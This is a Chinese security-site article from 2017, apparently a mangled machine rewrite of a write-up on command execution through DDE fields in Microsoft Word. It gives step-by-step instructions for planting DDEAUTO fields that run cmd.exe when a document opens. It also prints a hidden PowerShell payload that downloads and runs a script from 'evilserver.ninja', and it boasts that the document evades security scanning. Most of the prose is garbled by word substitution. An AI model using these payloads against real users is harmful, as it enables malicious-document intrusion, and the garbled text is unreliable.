欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

微软Office Word无宏命令执行破绽漏洞0day

来源:本站整理 作者:佚名 时间:2017-10-12 TAG: 我要投稿

假如咱们奉告你,在MS-Word上存在一种敕令履行漏洞破绽bug,其不必要任何宏或许内存溢出,会怎样呢?

Windows 为利用之间停止数据传输供给了多种传输方法,此中一种叫做静态互换协定,咱们简称它为DDE协定。DDE协定实在便是一套信息与指点参考。它在同享数据的利用法式之间发送新闻,并利用同享内存在利用法式之间停止数据互换。利用法式能够利用DDE协定停止一次性数据传输和连续互换,利用法式在新的数据可历时,会将更新发送给相互。
在咱们上面的文档傍边,咱们用经由过程履行一个利用运转DDE协定,以此来为咱们供给一个案例展示。在以前的贴子中,咱们评论辩论过在MS-Excel中利用DDE得到敕令履行,而且在利用此办法绕过了宏过滤邮件网安网关和企业VBA的战略方面得到胜利。DDE不只限于Excel中能够利用,在Word中也具备DDE功效,固然对于这2个功效的能够得到敕令履行的道路,以前曾经有人提出过,然则就咱们所知,到目前为止还没有人现实证实过这一点。
DDE and Office
艾蒂安和我正在研讨一些风趣的COM工具,分外是与MS-Office无关的内容,此中最有意思的是咱们发明COM办法在停止DDE初始化与DDE履行时都会被MS-Excel和MS-Word所裸露。自从MS-Excel给咱们供给了敕令履行,咱们就决议踏上发明之旅,正式开始去发明如安在MSWord上利用DDE和如安在其上面完成敕令履行。
进过不懈的尽力,咱们终究弄明确了如安在MS-Word上利用DDE。起首,咱们在增加‘字段’上停止操纵,请依照如下几个步调停止操纵便可。

拔出 - 文档部件 - 域

抉择 =(Formula) ,而后点击确认

以后,你应该会看到在文档中拔出一个字段,并表现差错“!非常的公式开头”,右键单击“此字段”,而后抉择“切换字段代码”。


字段代码此时会表现进去,咱们依照上面代码的内容,调换默许字段地区的代码;

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }
DDEAUTO 关键字会关照MS-Word这是一个DDE字段,并会在文档关上时主动自行,第二部门代码内容是分为两段,第一段内容为要履行的可履行文件的完备门路,第二段引号之间的内容是通报一个可履行法式(履行calc.exe)。

另一种办法是利用: CTRL+F9 间接创立一个空的字段标识符,而后间接拔出上面的 DDE 测试代码。
而后将文档保留为失常的Word文档“.docx”,并在任何机械上关上它。

第一个正告弹窗是更新文档链接,并无任何歹意内容。

第二个提醒请求用户能否必要履行指定的利用法式,到目前为止咱们能够觉得这是一个网安告警,仅是请求用户履行“cmd.exe”,这里咱们能够经由过程响应的语法改动后暗藏它。

当受害者点击此文档时,看到没...大笑(yinxiao...)

这还不是最棒的,最漂亮的工作是,咱们对此文档停止网安监测,发明居然没任何无关宏或许其余歹意的网安告警...,以是...哈哈...大笑三声...剩下的人人本身意淫吧....

Shells
为了给人人展示一个POC,咱们体例了一个利用Empire入侵攻击器的演示视频,跟上面异样在停止停止网安扫描验证后,咱们给出了上面的Payload。

{ DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://evilserver.ninja/pp.ps1');powershell -e $e "}
视频演示:
文档末了
咱们利用“DDE”字段标识符异样能够完成雷同后果:

{DDE "c:\\windows\\system32\\cmd.exe" "/c notepad" }
然则呢,你必要对.docx停止响应的改动,以启用其主动链接更新。为此,请在文档管理器中关上.docx并设置word/settings.xml,末了在将上面的XML标签拔出到docPr元素中。

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载